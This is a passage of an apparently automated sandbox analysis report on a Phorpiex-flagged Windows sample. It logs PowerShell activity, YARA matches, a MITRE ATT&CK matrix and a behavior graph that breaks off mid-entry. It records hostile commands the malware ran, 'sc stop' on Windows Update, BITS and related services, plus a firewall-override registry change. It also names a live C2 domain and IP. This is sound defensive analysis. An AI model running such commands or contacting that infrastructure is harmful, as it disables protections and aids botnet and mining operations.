                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCode function: 0_2_00A91968 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00A91968
                                Source: C:\Windows\System32\dwm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                Lowering of HIPS / PFW / Operating System Security Settings

                                barindex
                                Changes security center settings (notifications, updates, antivirus, firewall)
                                Source: C:\Windows\sysppvrdnvs.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverrideJump to behavior
                                Stops critical windows services
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait

                                Remote Access Functionality

                                barindex
                                Yara detected Phorpiex
                                Source: Yara matchFile source: 4.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.0.5232.scr.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.5232.scr.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000000.1653820217.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1532857494.000000000132C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: lJ4EzPSKMj.exe PID: 3780, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 5232.scr PID: 5460, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 760, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 5236, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5232.scr, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,3_2_00401470
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,3_2_00402020
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,3_2_0040E190
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_004013B0 CreateEventA,socket,bind,CreateThread,3_2_004013B0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,4_2_00401470
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,4_2_00402020
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,4_2_0040E190
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004013B0 CreateEventA,socket,bind,CreateThread,4_2_004013B0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,17_2_00401470
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,17_2_00402020
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,17_2_0040E190
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004013B0 CreateEventA,socket,bind,CreateThread,17_2_004013B0

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                                Windows Management Instrumentation                                		11
                                DLL Side-Loading                                		1
                                Abuse Elevation Control Mechanism                                		31
                                Disable or Modify Tools                                		11
                                Input Capture                                		1
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		34
                                Ingress Tool Transfer                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts12
                                Native API                                		21
                                Windows Service                                		11
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory1
                                System Network Connections Discovery                                		Remote Desktop Protocol11
                                Input Capture                                		2
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts12
                                Command and Scripting Interpreter                                		1
                                Scheduled Task/Job                                		21
                                Windows Service                                		1
                                Abuse Elevation Control Mechanism                                		Security Account Manager2
                                File and Directory Discovery                                		SMB/Windows Admin Shares3
                                Clipboard Data                                		1
                                Non-Standard Port                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Scheduled Task/Job                                		1
                                Registry Run Keys / Startup Folder                                		311
                                Process Injection                                		2
                                Obfuscated Files or Information                                		NTDS27
                                System Information Discovery                                		Distributed Component Object ModelInput Capture3
                                Non-Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                Service Execution                                		Network Logon Script1
                                Scheduled Task/Job                                		11
                                DLL Side-Loading                                		LSA Secrets341
                                Security Software Discovery                                		SSHKeylogging23
                                Application Layer Protocol                                		Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media1
                                PowerShell                                		RC Scripts1
                                Registry Run Keys / Startup Folder                                		221
                                Masquerading                                		Cached Domain Credentials2
                                Process Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                Modify Registry                                		DCSync141
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                                Virtualization/Sandbox Evasion                                		Proc Filesystem1
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                                Process Injection                                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                Hidden Files and Directories                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542689 Sample: lJ4EzPSKMj.exe Startdate: 26/10/2024 Architecture: WINDOWS Score: 100 106 twizthash.net 2->106 108 15.164.165.52.in-addr.arpa 2->108 122 Suricata IDS alerts for network traffic 2->122 124 Found malware configuration 2->124 126 Malicious sample detected (through community Yara rule) 2->126 128 15 other signatures 2->128 11 lJ4EzPSKMj.exe 15 2->11         started        16 winupsecvmgr.exe 2->16         started        18 winupsecvmgr.exe 2->18         started        20 5 other processes 2->20 signatures3 process4 dnsIp5 116 twizthash.net 185.215.113.66, 49704, 49705, 49707 WHOLESALECONNECTIONSNL Portugal 11->116 94 C:\Users\user\AppData\Local\Temp\5232.scr, PE32 11->94 dropped 96 C:\Users\user\AppData\Local\...\tdrpl[1].exe, PE32 11->96 dropped 162 Drops PE files with a suspicious file extension 11->162 22 5232.scr 1 1 11->22         started        98 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 16->98 dropped 100 C:\Users\user\AppData\...\jacrzswcvuml.tmp, PE32+ 16->100 dropped 164 Suspicious powershell command line found 16->164 166 Found strings related to Crypto-Mining 16->166 168 Writes to foreign memory regions 16->168 176 3 other signatures 16->176 26 conhost.exe 16->26         started        28 dwm.exe 16->28         started        170 Found direct / indirect Syscall (likely to bypass EDR) 18->170 172 Loading BitLocker PowerShell Module 20->172 30 conhost.exe 20->30         started        32 conhost.exe 20->32         started        34 conhost.exe 20->34         started        36 conhost.exe 20->36         started        file6 174 Detected Stratum mining protocol 116->174 signatures7 process8 file9 82 